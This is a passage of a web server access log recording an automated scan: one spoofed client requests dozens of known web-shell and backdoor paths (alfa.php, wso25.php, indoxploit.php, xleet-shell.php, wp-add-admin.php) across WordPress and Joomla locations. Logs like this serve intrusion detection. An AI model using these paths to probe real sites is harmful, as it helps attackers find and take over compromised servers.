AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:58:40 -0400] "GET /wp-content/plugins/cekidot/alf.php HTTP/1.1" 301 269 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:58:46 -0400] "GET /wp-content/fw.php HTTP/1.1" 301 252 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:58:48 -0400] "GET /wp-content/alfa.php HTTP/1.1" 301 254 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:58:50 -0400] "GET /snd.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:58:57 -0400] "GET /wp-class.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:59:05 -0400] "GET /small.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:59:09 -0400] "GET /wp-content/plugins/upspy/index.php HTTP/1.1" 301 269 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:59:12 -0400] "GET /wp-content/plugins/ubh/index.php HTTP/1.1" 301 267 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:59:15 -0400] "GET /wp-content/plugins/vwcleanerplugin/bump.php?cache HTTP/1.1" 301 284 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:59:19 -0400] "GET /wp-content/themes/gaukingo/db.php HTTP/1.1" 301 268 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:59:25 -0400] "GET /wp-content/plugins/three-column-screen-layout/db.php HTTP/1.1" 301 287 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:59:27 -0400] "GET /wp-content/plugins/xichang/x.php?xi HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:59:28 -0400] "GET /wp-content/plugins/html404/index.html HTTP/1.1" 301 272 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:59:33 -0400] "GET /wp-content/plugins/wp-db-ajax-made/wp-ajax.php HTTP/1.1" 301 281 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:59:37 -0400] "GET /Marvins.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:59:39 -0400] "GET /wp-includes/css/modules.php HTTP/1.1" 301 262 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:59:42 -0400] "GET /indoxploit.php HTTP/1.1" 301 249 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:59:44 -0400] "GET /wp-content/plugins/css-ready-sel/file.php HTTP/1.1" 301 276 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:59:48 -0400] "GET /wp-content/plugins/css-ready/file.php HTTP/1.1" 301 272 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:59:54 -0400] "GET /wp-content/think.php HTTP/1.1" 301 255 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:59:57 -0400] "GET /wp-content/plugins/html404/xccc.php HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:00:00 -0400] "GET /wp-content/plugins/html404/cry.php.pjpeg HTTP/1.1" 301 275 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:00:02 -0400] "GET /wp-content/plugins/real/v.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:00:08 -0400] "GET /wp-content/plugins/html404/wso25.php HTTP/1.1" 301 271 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:00:13 -0400] "GET /modules/mod_simplefileuploadv1.3/elements/udd.php HTTP/1.1" 301 284 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:00:15 -0400] "GET /libraries/joomla/css.php HTTP/1.1" 301 259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:00:19 -0400] "GET /libraries/joomla/jmails.php?u HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:00:21 -0400] "GET /libraries/joomla/jmail.php?u HTTP/1.1" 301 263 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:00:27 -0400] "GET /images/vuln.php HTTP/1.1" 301 250 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:00:34 -0400] "GET /tmp/vuln.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:00:36 -0400] "GET /rxr.php?rxr HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:00:39 -0400] "GET /modules/modules/modules.php HTTP/1.1" 301 262 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:00:42 -0400] "GET /error.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:00:45 -0400] "GET /wp-content/themes/fitnessbase/404.php?ok HTTP/1.1" 301 275 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:00:48 -0400] "GET /wp-add-admin.php HTTP/1.1" 301 251 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:00:51 -0400] "GET /RxR.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:00:56 -0400] "GET /modules/mod_simplefileuploadv1.3/elements/udd.php HTTP/1.1" 301 284 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:00:58 -0400] "GET /components/com_b2jcontact/izoc.php HTTP/1.1" 301 269 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:01:01 -0400] "GET /administrator/templates/bluestork/error.php HTTP/1.1" 301 278 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:01:06 -0400] "GET /administrator/templates/hathor/index.php HTTP/1.1" 301 275 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:01:08 -0400] "GET /administrator/templates/hathor/error.php HTTP/1.1" 301 275 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:01:12 -0400] "GET /administrator/templates/isis/index.php HTTP/1.1" 301 273 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:01:15 -0400] "GET /administrator/templates/isis/error.php HTTP/1.1" 301 273 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:01:19 -0400] "GET /templates/beez/index.php HTTP/1.1" 301 259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:01:21 -0400] "GET /templates/ja_purity/index.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:01:25 -0400] "GET /templates/rhuk_milkyway/index.php HTTP/1.1" 301 268 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:01:28 -0400] "GET /templates/+theme+/index.php HTTP/1.1" 301 262 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:01:30 -0400] "GET /templates/+theme+/error.php HTTP/1.1" 301 262 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:01:32 -0400] "GET /templates/beez3/index.php HTTP/1.1" 301 260 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 68.183.245.101 - - [13/Aug/2025:04:01:32 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [13/Aug/2025:04:01:32 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [13/Aug/2025:04:01:32 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:04:01:32 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [13/Aug/2025:04:01:38 -0400] "GET /templates/beez3/error.php HTTP/1.1" 301 260 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:01:43 -0400] "GET /templates/beez5/index.php HTTP/1.1" 301 260 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:01:46 -0400] "GET /templates/beez5/error.php HTTP/1.1" 301 260 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:01:49 -0400] "GET /templates/beez_20/index.php HTTP/1.1" 301 262 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:01:51 -0400] "GET /templates/beez_20/error.php HTTP/1.1" 301 262 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:01:55 -0400] "GET /templates/protostar/index.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:01:59 -0400] "GET /templates/protostar/error.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:02:02 -0400] "GET /templates/atomic/index.php HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:02:05 -0400] "GET /templates/atomic/error.php HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:02:07 -0400] "GET /wp-admin/network/wp-footer.php HTTP/1.1" 301 265 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:02:13 -0400] "GET /wp-content/vuln.php HTTP/1.1" 301 254 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:02:19 -0400] "GET /upel.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:02:21 -0400] "GET /wp-content/uploads/ HTTP/1.1" 301 254 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:02:25 -0400] "GET /wp-content/uploads/+year+/+month+/ HTTP/1.1" 301 269 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:02:28 -0400] "GET /license.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:02:32 -0400] "GET /wp-content/plugins/ppus/up.php HTTP/1.1" 301 265 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:02:36 -0400] "GET /098.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:02:39 -0400] "GET /new_license.php HTTP/1.1" 301 250 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:02:41 -0400] "GET /wp-content/plugins/theme-configurator/mini.php HTTP/1.1" 301 281 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:02:44 -0400] "GET /wp-content/plugins/widget-logic/mini.php HTTP/1.1" 301 275 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:02:49 -0400] "GET /wp-admin/css/index.php HTTP/1.1" 301 257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:02:56 -0400] "GET /1975.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:02:59 -0400] "GET /1975.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:03:02 -0400] "GET /radio.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:03:07 -0400] "GET /wp-includes/wp-class.php HTTP/1.1" 301 259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:03:10 -0400] "GET /xleet-shell.php HTTP/1.1" 301 250 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:03:12 -0400] "GET /wp-content/radio.php HTTP/1.1" 301 255 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:03:16 -0400] "GET /wp-includes/radio.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:03:19 -0400] "GET /fx.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:03:20 -0400] "GET /wp-admin/images/atomlib.php HTTP/1.1" 301 262 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:03:23 -0400] "GET /gel4y.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:03:25 -0400] "GET /jindex.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:03:27 -0400] "GET /wp-content/about.php HTTP/1.1" 301 255 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:03:30 -0400] "GET /sh.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:03:34 -0400] "GET /wp-includes/991176.php HTTP/1.1" 301 257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:03:37 -0400] "GET /wp-admin/maint/about.php HTTP/1.1" 301 259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:03:40 -0400] "GET /fox.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:03:42 -0400] "GET /wp-admin/x.php HTTP/1.1" 301 249 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:03:44 -0400] "GET /fw.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) 